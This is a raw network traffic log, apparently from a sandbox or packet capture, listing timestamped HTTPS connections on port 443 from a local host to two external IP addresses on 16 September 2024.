Sep 16, 2024 21:23:23.531194925 CEST	443	49785	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:23.531219006 CEST	443	49785	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:23.533744097 CEST	49785	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:23.533759117 CEST	443	49785	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:23.538404942 CEST	443	49785	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:23.538789988 CEST	49785	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:23.538789988 CEST	49785	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:23.558665037 CEST	49786	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:23.558717012 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:23.558989048 CEST	49786	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:23.559159040 CEST	49786	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:23.559170008 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:24.026954889 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:24.031668901 CEST	49786	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:24.031707048 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:24.255613089 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:24.255670071 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:24.255706072 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:24.255734921 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:24.255739927 CEST	49786	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:24.255775928 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:24.255796909 CEST	49786	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:24.255825043 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:24.255851030 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:24.255873919 CEST	49786	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:24.255878925 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:24.255945921 CEST	443	49786	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:24.255973101 CEST	49786	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:24.256031990 CEST	49786	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:24.256320953 CEST	49786	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:28.682708979 CEST	49787	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:28.682760954 CEST	443	49787	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:28.682826042 CEST	49787	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:28.683280945 CEST	49787	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:28.683295012 CEST	443	49787	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:29.141905069 CEST	443	49787	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:29.143666983 CEST	49787	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:29.143708944 CEST	443	49787	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:29.285518885 CEST	443	49787	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:29.285626888 CEST	443	49787	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:29.285676956 CEST	443	49787	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:29.285689116 CEST	49787	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:29.285712004 CEST	443	49787	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:29.285751104 CEST	49787	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:29.285758018 CEST	443	49787	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:29.285818100 CEST	443	49787	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:29.285866022 CEST	49787	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:29.286442995 CEST	49787	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:29.311032057 CEST	49788	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:29.311070919 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:29.311130047 CEST	49788	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:29.311400890 CEST	49788	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:29.311413050 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:29.781692028 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:29.783543110 CEST	49788	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:29.783564091 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:30.036614895 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:30.036663055 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:30.036695004 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:30.036726952 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:30.036752939 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:30.036765099 CEST	49788	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:30.036776066 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:30.036788940 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:30.036814928 CEST	49788	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:30.036844015 CEST	49788	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:30.036854029 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:30.036899090 CEST	443	49788	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:30.036916018 CEST	49788	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:30.036938906 CEST	49788	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:30.037389040 CEST	49788	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:34.431680918 CEST	49789	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:34.431756020 CEST	443	49789	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:34.435739040 CEST	49789	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:34.436069965 CEST	49789	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:34.436103106 CEST	443	49789	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:34.906090021 CEST	443	49789	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:34.908384085 CEST	49789	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:34.908444881 CEST	443	49789	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:35.053605080 CEST	443	49789	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:35.053659916 CEST	443	49789	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:35.053699970 CEST	443	49789	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:35.053726912 CEST	49789	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:35.053742886 CEST	443	49789	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:35.053756952 CEST	443	49789	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:35.053800106 CEST	49789	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:35.053822041 CEST	443	49789	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:35.053848028 CEST	443	49789	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:35.053878069 CEST	49789	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:35.053920984 CEST	49789	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:35.054591894 CEST	49789	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:35.089673042 CEST	49790	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:35.089703083 CEST	443	49790	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:35.089835882 CEST	49790	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:35.090137959 CEST	49790	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:35.090147018 CEST	443	49790	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:35.561966896 CEST	443	49790	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:35.567688942 CEST	49790	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:35.567702055 CEST	443	49790	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:35.790324926 CEST	443	49790	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:35.790394068 CEST	443	49790	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:35.790450096 CEST	443	49790	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:35.790502071 CEST	443	49790	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:35.790570021 CEST	443	49790	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:35.790752888 CEST	443	49790	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:35.790795088 CEST	49790	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:35.790803909 CEST	443	49790	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:35.790956974 CEST	443	49790	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:35.791682005 CEST	49790	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:35.795705080 CEST	49790	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:40.213725090 CEST	49791	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:40.213783979 CEST	443	49791	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:40.215111971 CEST	49791	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:40.215475082 CEST	49791	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:40.215491056 CEST	443	49791	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:40.693576097 CEST	443	49791	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:40.696023941 CEST	49791	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:40.696090937 CEST	443	49791	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:40.840800047 CEST	443	49791	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:40.840893030 CEST	443	49791	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:40.840939999 CEST	443	49791	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:40.840953112 CEST	49791	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:40.841012001 CEST	443	49791	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:40.841068029 CEST	49791	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:40.841187000 CEST	443	49791	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:40.841295004 CEST	443	49791	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:40.841345072 CEST	49791	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:40.848093987 CEST	49791	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:40.867511988 CEST	49792	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:40.867569923 CEST	443	49792	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:40.867647886 CEST	49792	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:40.867850065 CEST	49792	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:40.867882013 CEST	443	49792	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:41.323106050 CEST	443	49792	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:41.324949980 CEST	49792	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:41.325040102 CEST	443	49792	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:41.570306063 CEST	443	49792	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:41.570370913 CEST	443	49792	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:41.570416927 CEST	443	49792	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:41.570444107 CEST	49792	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:41.570452929 CEST	443	49792	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:41.570467949 CEST	443	49792	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:41.570513964 CEST	49792	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:41.570532084 CEST	443	49792	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:41.570648909 CEST	49792	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:41.570864916 CEST	443	49792	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:41.571019888 CEST	443	49792	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:41.571227074 CEST	49792	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:41.571662903 CEST	49792	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:45.995229959 CEST	49793	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:45.995279074 CEST	443	49793	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:45.995353937 CEST	49793	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:45.995809078 CEST	49793	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:45.995819092 CEST	443	49793	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:46.473253012 CEST	443	49793	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:46.475449085 CEST	49793	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:46.475462914 CEST	443	49793	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:46.618557930 CEST	443	49793	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:46.618659973 CEST	443	49793	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:46.618695021 CEST	443	49793	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:46.618706942 CEST	443	49793	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:46.618721962 CEST	49793	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:46.618727922 CEST	443	49793	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:46.618784904 CEST	49793	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:46.618827105 CEST	443	49793	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:46.618910074 CEST	49793	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:46.619525909 CEST	49793	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:46.640827894 CEST	49794	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:46.640914917 CEST	443	49794	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:46.640994072 CEST	49794	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:46.641311884 CEST	49794	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:46.641340971 CEST	443	49794	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:46.647722960 CEST	49794	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:46.691456079 CEST	443	49794	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:47.107734919 CEST	443	49794	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:47.107839108 CEST	49794	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:51.757401943 CEST	49795	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:51.757453918 CEST	443	49795	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:51.757523060 CEST	49795	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:51.759668112 CEST	49795	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:51.759684086 CEST	443	49795	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:52.249360085 CEST	443	49795	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:52.303293943 CEST	49795	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:52.356703997 CEST	49795	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:52.356733084 CEST	443	49795	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:52.465245008 CEST	443	49795	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:52.465274096 CEST	443	49795	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:52.465291977 CEST	443	49795	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:52.465334892 CEST	49795	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:52.465361118 CEST	443	49795	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:52.465432882 CEST	49795	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:52.467614889 CEST	443	49795	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:52.467694998 CEST	443	49795	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:52.468010902 CEST	49795	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:52.470073938 CEST	49795	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:52.592185974 CEST	49796	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:52.592257977 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:52.592319965 CEST	49796	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:52.592704058 CEST	49796	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:52.592725992 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.093197107 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.093308926 CEST	49796	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:53.095120907 CEST	49796	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:53.095128059 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.095330000 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.096527100 CEST	49796	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:53.139413118 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.315417051 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.315465927 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.315510035 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.315534115 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.315582991 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.315598965 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.315648079 CEST	49796	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:53.315648079 CEST	49796	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:53.315669060 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.315681934 CEST	49796	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:53.315697908 CEST	443	49796	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:53.315741062 CEST	49796	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:53.316133976 CEST	49796	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:57.710608006 CEST	49797	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:57.710665941 CEST	443	49797	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:57.710820913 CEST	49797	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:57.711067915 CEST	49797	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:57.711081982 CEST	443	49797	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:58.185219049 CEST	443	49797	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:58.240329027 CEST	49797	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:58.240391016 CEST	443	49797	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:58.349973917 CEST	443	49797	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:58.350022078 CEST	443	49797	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:58.350049019 CEST	443	49797	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:58.350070953 CEST	443	49797	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:58.350109100 CEST	49797	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:58.350143909 CEST	443	49797	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:58.350159883 CEST	443	49797	104.20.4.235	192.168.2.6
Sep 16, 2024 21:23:58.350178957 CEST	49797	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:58.354022980 CEST	49797	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:58.361983061 CEST	49797	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:23:58.600851059 CEST	49798	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:58.600922108 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:58.600996971 CEST	49798	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:58.601520061 CEST	49798	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:58.601542950 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.072278976 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.074542046 CEST	49798	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:59.074608088 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.308525085 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.308576107 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.308610916 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.308626890 CEST	49798	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:59.308646917 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.308660030 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.308697939 CEST	49798	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:59.308717966 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.308746099 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.308767080 CEST	49798	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:59.308778048 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.308824062 CEST	49798	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:59.308831930 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.308844090 CEST	443	49798	188.114.97.3	192.168.2.6
Sep 16, 2024 21:23:59.308892012 CEST	49798	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:23:59.309990883 CEST	49798	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:03.735377073 CEST	49799	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:03.735435009 CEST	443	49799	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:03.735759020 CEST	49799	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:03.736084938 CEST	49799	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:03.736102104 CEST	443	49799	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:04.205214024 CEST	443	49799	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:04.235672951 CEST	49799	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:04.235685110 CEST	443	49799	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:04.342905045 CEST	443	49799	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:04.342952013 CEST	443	49799	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:04.342984915 CEST	443	49799	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:04.343014956 CEST	443	49799	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:04.343091011 CEST	443	49799	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:04.343100071 CEST	49799	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:04.343100071 CEST	49799	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:04.344176054 CEST	49799	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:04.355340004 CEST	49799	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:04.575300932 CEST	49800	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:04.575376034 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:04.575449944 CEST	49800	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:04.575809002 CEST	49800	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:04.575820923 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.059525013 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.061130047 CEST	49800	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:05.061170101 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.294636965 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.294696093 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.294760942 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.294883013 CEST	49800	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:05.294922113 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.294950008 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.295032978 CEST	49800	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:05.295140028 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.295224905 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.295265913 CEST	49800	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:05.295279026 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.295361996 CEST	49800	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:05.295418978 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.295552969 CEST	443	49800	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:05.295612097 CEST	49800	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:05.295880079 CEST	49800	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:09.703692913 CEST	49801	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:09.703742981 CEST	443	49801	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:09.703819990 CEST	49801	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:09.704123020 CEST	49801	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:09.704143047 CEST	443	49801	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:10.199090004 CEST	443	49801	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:10.201262951 CEST	49801	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:10.201297045 CEST	443	49801	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:10.864701986 CEST	443	49801	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:10.864773989 CEST	443	49801	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:10.864825010 CEST	443	49801	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:10.864866018 CEST	443	49801	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:10.864890099 CEST	49801	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:10.864949942 CEST	443	49801	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:10.864983082 CEST	49801	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:10.865036964 CEST	443	49801	104.20.4.235	192.168.2.6
Sep 16, 2024 21:24:10.865372896 CEST	49801	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:10.866333961 CEST	49801	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:24:10.912493944 CEST	49802	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:10.912549973 CEST	443	49802	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:10.912666082 CEST	49802	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:10.915047884 CEST	49802	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:10.915060997 CEST	443	49802	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:11.441812038 CEST	443	49802	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:11.445154905 CEST	49802	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:24:11.445180893 CEST	443	49802	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:11.682148933 CEST	443	49802	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:11.682198048 CEST	443	49802	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:11.682265043 CEST	443	49802	188.114.97.3	192.168.2.6
Sep 16, 2024 21:24:11.682295084 CEST	443	49802	188.114.97.3	192.168.2.6
